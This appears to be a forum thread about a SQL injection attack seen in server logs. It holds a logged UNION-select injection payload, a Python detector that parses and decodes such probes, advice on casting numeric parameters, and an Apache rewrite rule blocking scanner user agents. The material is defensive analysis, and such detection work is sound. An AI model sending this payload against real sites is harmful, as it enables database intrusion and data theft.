XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:46 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
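As an added example (not from the post or from the forum software), this Python script parses constructed Apache log lines modelled on the excerpt above, decodes the injected SELECT list and groups the probes by client, user agent and parameter; the function and constant names are my own. It shows what the requests do: "and 1=2" empties the original result set, the attacker adds one CONCAT(...) column per request until the UNION's column count matches the original query, and CONCAT(0x27,0x7c,0x5f,0x7c) builds the marker string '|_| from hex literals so that no quote character appears in the URL.

```python
"""Spot UNION column-count probing in Apache access logs (constructed sample data)."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" format, the layout of the excerpt in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# Probe shape seen in the post: <value> and 1=2 union select <col>,<col>,... /*
UNION_RE = re.compile(r'\band\s+1=2\s+union\s+select\s+(?P<cols>.+?)\s*/\*\s*$', re.I)

# Constructed sample lines modelled on the post's excerpt (not copied from it).
SAMPLE_LOG = [
    'XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:39 +0000] "GET /mein_php_script.php?upid=sp7&zugang=1&id=2 HTTP/1.1" 404 1516 "-" "My   Session"',
    'XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:39 +0000] "GET /mein_php_script.php?upid=sp7&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"',
    'XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:39 +0000] "GET /mein_php_script.php?upid=sp7&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"',
    'XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?zugang=1&id=&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"',
]

def split_top_level(expr):
    """Split a SELECT list on commas outside parentheses, so CONCAT(a,b) stays one column."""
    parts, cur, depth = [], [], 0
    for ch in expr:
        depth += (ch == '(') - (ch == ')')
        if ch == ',' and depth == 0:
            parts.append(''.join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    parts.append(''.join(cur).strip())
    return parts

def marker_text(col):
    """Render CONCAT(0x27,0x7c,...) of hex literals as the string the probe would print."""
    m = re.fullmatch(r'CONCAT\(([^()]*)\)', col, re.I)
    out = []
    for arg in (m.group(1) if m else col).split(','):
        h = re.fullmatch(r'\s*0x([0-9a-fA-F]+)\s*', arg)
        out.append(bytes.fromhex(h.group(1)).decode('latin-1') if h else arg.strip())
    return ''.join(out)

def probe_in_request(url):
    """Return (parameter, column_count, marker) for a UNION probe in the URL, else None."""
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        m = UNION_RE.search(value)
        if m:
            cols = split_top_level(m.group('cols'))
            return name, len(cols), marker_text(cols[0])
    return None

def scan_log(lines):
    """Group probes by (client, user agent, parameter) with the column counts tried."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        probe = probe_in_request(m['url']) if m else None
        if probe:
            hits[(m['ip'], m['ua'], probe[0])].append((probe[1], probe[2]))
    return dict(hits)
```

Note that mysql_real_escape_string() only escapes quote characters inside string literals; a numeric parameter such as id=2 and 1=2 ... contains none and passes through unchanged, so numeric IDs need a cast to int or a prepared statement. A run of 404s from one user agent with a rising column count on the same parameter is the signal to alert on.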

Roger Wilco
Administrator
Posts: 6001
Joined: 2004-05-23 12:53

Re: MySQL-Injection

Post by Roger Wilco »

This exact attack is analysed at http://secshoggoth.blogspot.com/2009/03 ... ttack.html.

evilduffp
Posts: 70
Joined: 2005-07-06 00:14

Re: MySQL-Injection

Post by evilduffp »

Ah great, many thanks.

Joe User
Project Manager
Posts: 11519
Joined: 2003-02-27 01:00
Location: Hamburg

Re: MySQL-Injection

Post by Joe User »

PayPal.Me/JoeUser | FreeBSD Remote Installation
Wings for Life | Wings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.

Joe User
Project Manager
Posts: 11519
Joined: 2003-02-27 01:00
Location: Hamburg

Re: MySQL-Injection

Post by Joe User »

http://whitehatsecurityresponse.blogspo ... s-and.html

Code:

# Requests whose User-Agent contains 32ts or 32Sn (case-insensitive because of [NC]) ...
RewriteCond %{HTTP_USER_AGENT} (32ts|32Sn) [NC]
# ... are redirected to an address that cannot exist, so the scanner gets nothing back from this host
RewriteRule ^(.*)$ http://256.256.256.256/ [R=301,L]